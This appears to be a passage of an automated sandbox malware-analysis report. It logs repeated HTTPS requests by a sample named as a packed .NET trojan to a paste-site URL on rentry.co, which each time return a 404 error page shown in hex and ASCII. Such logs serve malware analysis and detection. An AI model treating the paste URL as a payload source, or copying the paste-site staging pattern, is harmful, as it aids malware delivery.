                                                                                        2024-10-18 10:43:09 UTC707INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:09 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:43:09 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:09 UTC1015INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 66 63 63 39 36 32 61 39 31 65 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 34 4f 53 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ecfcc962a91e',t:'MTcyOTI0ODE4OS4w
                                                                                        2024-10-18 10:43:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.660674104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:10 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:11 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:10 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5MO%2Bn65JJSU%2BcuNSoVc6DrSFHre1NrcXHhxn07a7tD2KMitW0cmU5qzrQknCL1X5HB%2FUY1wEZEC6Mb2X3wtIoXGQ41vPCU206M68QbGh3SlnxHbKQCBB9HKP0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed085e06477e-DFW
                                                                                        2024-10-18 10:43:11 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:11 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:43:11 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:11 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 30 38 35 65 30 36 34 37 37 65 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 35 4d 43 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed085e06477e',t:'MTcyOTI0ODE5MC4wMDAwMD
                                                                                        2024-10-18 10:43:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.660675104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:12 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:12 UTC652INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:12 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzWD072naOMb0AXeUCOdhUvcCqa%2FdKhpgBfzgqkJnp2YoIrxs1uTlQyWKOeXMzIT2ltPvaf3X2tjzbzX3Cj34MuekPaEODVrUJoc6AUzbnj9vUCheFtsxYtaNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed136b03e726-DFW
                                                                                        2024-10-18 10:43:12 UTC717INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:12 UTC1369INData Raw: 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                        Data Ascii: operty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property
                                                                                        2024-10-18 10:43:12 UTC1369INData Raw: 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                        Data Ascii: pt.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div
                                                                                        2024-10-18 10:43:12 UTC1005INData Raw: 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 31 33 36 62 30 33 65 37 32 36 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 35 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d
                                                                                        Data Ascii: .min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed136b03e726',t:'MTcyOTI0ODE5Mi4wMDAwMDA='}
                                                                                        2024-10-18 10:43:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.660676104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:14 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:14 UTC650INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:14 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sd1DYEetRhLZPH8E5ICKeq3Ctp6FCmoxtK2SW3VREYU0OpgEeK9gmDUSNjHrZcPZmFyP72nigOUrNf53jKRu8D4BHPnM5h2adXaeBNOYKNnXezhWReaSgb3Y5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed1e1b7a6b2b-DFW
                                                                                        2024-10-18 10:43:14 UTC719INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:14 UTC1369INData Raw: 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22
                                                                                        Data Ascii: erty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property="
                                                                                        2024-10-18 10:43:14 UTC1369INData Raw: 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63
                                                                                        Data Ascii: .defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div c
                                                                                        2024-10-18 10:43:14 UTC1003INData Raw: 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 31 65 31 62 37 61 36 62 32 62 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 35 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
                                                                                        Data Ascii: in.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed1e1b7a6b2b',t:'MTcyOTI0ODE5NC4wMDAwMDA='};v
                                                                                        2024-10-18 10:43:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.660678104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:15 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:16 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:16 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VjjcmluCezW2HEH1jkJdvVEtLXhBPLEdPUwxT3RdgEMrCPywMONkIjh7aNGU6ULfj%2F%2BPqCw86Cy9WlaFwAGv68%2Fvr8opHzm3xjhuanxIcqhWxWoqqi0dmOJqyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed288cde468c-DFW
